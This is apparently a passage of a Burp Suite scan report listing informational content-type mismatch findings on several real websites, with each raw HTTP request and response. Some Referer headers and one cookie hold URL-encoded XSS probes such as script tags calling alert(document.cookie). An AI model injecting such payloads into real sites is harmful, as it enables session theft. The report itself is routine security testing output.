GET /templates/beez_20/fonts/TitilliumMaps29L002.otf HTTP/1.1
Host: venedet.michnica.net
Proxy-Connection: keep-alive
Referer: http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu?57476%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e3231f45f59c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fa5a1b42d3949309610b52593e36fa6f=5bee479ce7f93991cea282d14030843c

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:09:35 GMT
Server: Apache
Vary: Host
Last-Modified: Tue, 11 Jan 2011 21:22:09 GMT
ETag: "ce007e-bb70-49998ad55c240"
Accept-Ranges: bytes
Content-Length: 47984
Content-Type: text/plain

OTTO.......0CFF /<....B|..m.GPOS.......p....GSUB;.R....@....OS/2..f.... ...`cmap    ..p..;.....head..+u.......6hhea...........$hmtx..b....4....maxp..P.........name..R.......:.post......B\... .........0?:
...[SNIP]...

32.64. http://wildspark.com/asher/ija/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wildspark.com
Path:   /asher/ija/

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /asher/ija/ HTTP/1.1
Host: wildspark.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:03:04 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tu=fc371e99f833e248ace3a9b91346cedd; expires=Tue, 31-Dec-2019 23:00:00 GMT; path=/; domain=wildspark.com; httponly
Vary: User-Agent,Accept-Encoding
Content-Length: 6
Content-Type: text/html
X-Cache: MISS from 337663
Connection: close

<b-ua>

32.65. http://www.abbreviations.com/images/goog.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.abbreviations.com
Path:   /images/goog.jpg

Issue detail

The response contains the following Content-type statement:
  • Content-Type: image/jpeg
The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/goog.jpg HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: image/jpeg
Last-Modified: Mon, 13 Oct 2008 04:03:16 GMT
Accept-Ranges: bytes
ETag: "a01ac19ee82cc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 21:08:31 GMT
Content-Length: 960

GIF89a..........X._....81.../w...H;k......LM[......'....oj.sf...u.v........yY...........8.?.j]-.;...n...|.....M...W.......}..........gLf|.r{.....=%........~Tp.w..Jv...........v`y..~..........y..0..;.
...[SNIP]...

32.66. http://www.abbreviations.com/images/t.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.abbreviations.com
Path:   /images/t.gif

Issue detail

The response contains the following Content-type statement:
  • Content-Type: image/gif
The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/t.gif HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: image/gif
Last-Modified: Tue, 18 Jan 2011 14:55:23 GMT
Accept-Ranges: bytes
ETag: "a0c2ecbb1fb7cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 21:08:32 GMT
Content-Length: 297

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.%...B....LH.>...b.(..7..Gb\.....4....!..`.`.....!.'....|.T.$~..... ..Pg...7.y.....P..@...3.y.$.....$E    ...d.B.@t
...[SNIP]...

32.67. http://www.adobe.com/xml/schemas/PolicyFile.xsd

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.adobe.com
Path:   /xml/schemas/PolicyFile.xsd

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain XML.

Request

GET /xml/schemas/PolicyFile.xsd HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:09 GMT
Server: Apache
Last-Modified: Fri, 23 Jan 2009 06:51:42 GMT
ETag: "194f-d24dbb80"
Accept-Ranges: bytes
Content-Length: 6479
Cache-Control: max-age=21600
Expires: Tue, 25 Jan 2011 20:04:09 GMT
Connection: close
Content-Type: text/plain

<?xml version="1.0"?>

<!-- Copyright (c) 2007-2009 Adobe Systems Incorporated. All Rights Reserved. -->

<!-- XML Schema for policy files -->
<!-- Generic version for all policy files; see more
...[SNIP]...

32.68. http://www.apache.org/licenses/LICENSE-2.0

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.apache.org
Path:   /licenses/LICENSE-2.0

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /licenses/LICENSE-2.0 HTTP/1.1
Host: www.apache.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:07:00 GMT
Server: Apache/2.3.8 (Unix) mod_ssl/2.3.8 OpenSSL/1.0.0a
Content-Location: LICENSE-2.0.txt
Vary: negotiate,accept
TCN: choice
Last-Modified: Mon, 01 Nov 2010 19:49:36 GMT
ETag: "d23b5d-2c5e-494031b9e1400;49a8819beb140"
Accept-Ranges: bytes
Content-Length: 11358
Cache-Control: max-age=3600
Expires: Tue, 25 Jan 2011 15:07:00 GMT
Connection: close
Content-Type: text/plain


Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/

TERMS AND CONDITIONS FOR USE, REPRODUC
...[SNIP]...

32.69. http://www.autobytel.com/syndication/act_newsletter_submit.cfm

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autobytel.com
Path:   /syndication/act_newsletter_submit.cfm

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=UTF-8
The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /syndication/act_newsletter_submit.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 17
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:53:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:46 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:45 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/

{ errorCode: 0 }

32.70. http://www.autocheck.com/consumers/stylesheets/images/homepage/homepage_slides/slides_container.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autocheck.com
Path:   /consumers/stylesheets/images/homepage/homepage_slides/slides_container.jpg

Issue detail

The response contains the following Content-type statement:
  • Content-Type: image/jpeg
The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /consumers/stylesheets/images/homepage/homepage_slides/slides_container.jpg HTTP/1.1
Host: www.autocheck.com
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.312031295921916242; referralCookie=cQ2iP5kQz9HfdyY962; JSESSIONID=cQ2iP5kQz9HfdyY962; WT_FPC=id=173.193.214.243-1295921924.19297:lv=1295943525442:ss=1295943525442; op327homepage1gum=a03n09k08o271pm06i39i515f; op327homepage1liid=a03n09k08o271pm06i39i515f

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:02 GMT
Server: Apache
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Last-Modified: Thu, 13 Jan 2011 19:32:46 GMT
ETag: "bccaf-54a-4d2f535e"
Accept-Ranges: bytes
Content-Length: 1354
Content-Type: image/jpeg

.PNG
.
...IHDR...............h.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...=K.W....(h.D..B.....;u.....B...;.
...t.RpppV.../\tH.............6.....O.<q9..s.h...V....3D.r9..........._....z{{C>...
...[SNIP]...

32.71. http://www.autocheck.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autocheck.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.autocheck.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.312031295921916242; referralCookie=cQ2iP5kQz9HfdyY962; JSESSIONID=cQ2iP5kQz9HfdyY962; WT_FPC=id=173.193.214.243-1295921924.19297:lv=1295943525442:ss=1295943525442; op327homepage1gum=a03n09k08o271pm06i39i515f; op327homepage1liid=a03n09k08o271pm06i39i515f

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:15 GMT
Server: Apache
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Last-Modified: Tue, 12 Oct 2010 19:30:26 GMT
ETag: "31ef09-47e-4cb4b752"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ..................................n;..g3......................................................R..L...L...M...................................................L...L
...[SNIP]...

32.72. http://www.autotrader.com/ajax/backButtonFix.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autotrader.com
Path:   /ajax/backButtonFix.jsp

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html;charset=ISO-8859-1
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /ajax/backButtonFix.jsp?Log=0&rand=7661 HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; ATC_USER_ZIP=; BIGipServerwww=1619582986.61475.0000; mbox=check#true#1295922044|session#1295921983404-727382#1295923844|PC#1295921983404-727382.17#1297131585; ATC_PID=-1761786222|959219900373039673; BIRF_Audit=true

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 34

/fyc/index.jsp?bkms=1295921992363

32.73. http://www.autotrader.com/no_cache/ac/hp_rotating_promos.asis

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autotrader.com
Path:   /no_cache/ac/hp_rotating_promos.asis

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /no_cache/ac/hp_rotating_promos.asis?rdpage=71015_1_TIMOFREASIER&cache_kill=1295921990056 HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; ATC_USER_ZIP=; BIGipServerwww=1619582986.61475.0000; mbox=check#true#1295922044|session#1295921983404-727382#1295923844|PC#1295921983404-727382.17#1297131585; ATC_PID=-1761786222|959219900373039673; BIRF_Audit=true

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:48 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

32.74. http://www.autotrader.com/no_cache/ac/index_wwwautoconnectcom_ac.asis

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autotrader.com
Path:   /no_cache/ac/index_wwwautoconnectcom_ac.asis

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /no_cache/ac/index_wwwautoconnectcom_ac.asis?cache_kill=1295921992301 HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; ATC_USER_ZIP=; BIGipServerwww=1619582986.61475.0000; mbox=check#true#1295922044|session#1295921983404-727382#1295923844|PC#1295921983404-727382.17#1297131585; ATC_PID=-1761786222|959219900373039673; BIRF_Audit=true

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:50 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

32.75. http://www.autotrader.com/no_cache/ac/trader_clicks_0001_nocount.asis

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0001_nocount.asis

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /no_cache/ac/trader_clicks_0001_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=7569AE0D6B39E1B; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767490185; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=1737023498.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

32.76. http://www.autotrader.com/no_cache/ac/trader_clicks_0002_nocount.asis

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0002_nocount.asis

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /no_cache/ac/trader_clicks_0002_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=BF3F7217996B123A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767492259; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=1317593098.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

32.77. http://www.autotrader.com/no_cache/ac/trader_clicks_0005_nocount.asis

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0005_nocount.asis

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /no_cache/ac/trader_clicks_0005_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=1AA3D7F874709C04; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767486770; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=1653137418.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

32.78. http://www.autotrader.com/no_cache/ac/trader_clicks_0006_nocount.asis

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0006_nocount.asis

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /no_cache/ac/trader_clicks_0006_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=4BE5B3481EBAD751; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767492827; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=2022236170.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

32.79. http://www.autotrader.com/no_cache/ac/trader_clicks_0009_nocount.asis

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0009_nocount.asis

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /no_cache/ac/trader_clicks_0009_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=DE05B78BAE6BA143; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767489238; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=2575884298.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

32.80. http://www.autotrader.com/no_cache/ac/trader_clicks_0016_nocount.asis

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0016_nocount.asis

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /no_cache/ac/trader_clicks_0016_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=F295814A75AF51AA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767489157; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=1250484234.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

32.81. http://www.autotraderstatic.com/dwr/interface/MarketManager.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autotraderstatic.com
Path:   /dwr/interface/MarketManager.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain;charset=ISO-8859-1
The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /dwr/interface/MarketManager.js?v=3.17.167500 HTTP/1.1
Host: www.autotraderstatic.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: M7F1=CT
If-Modified-Since: Tue, 07 Dec 2010 19:10:54 GMT

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 07 Dec 2010 19:33:57 GMT
Content-Type: text/plain;charset=ISO-8859-1
Cache-Control: max-age=272754
Date: Tue, 25 Jan 2011 02:19:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 566


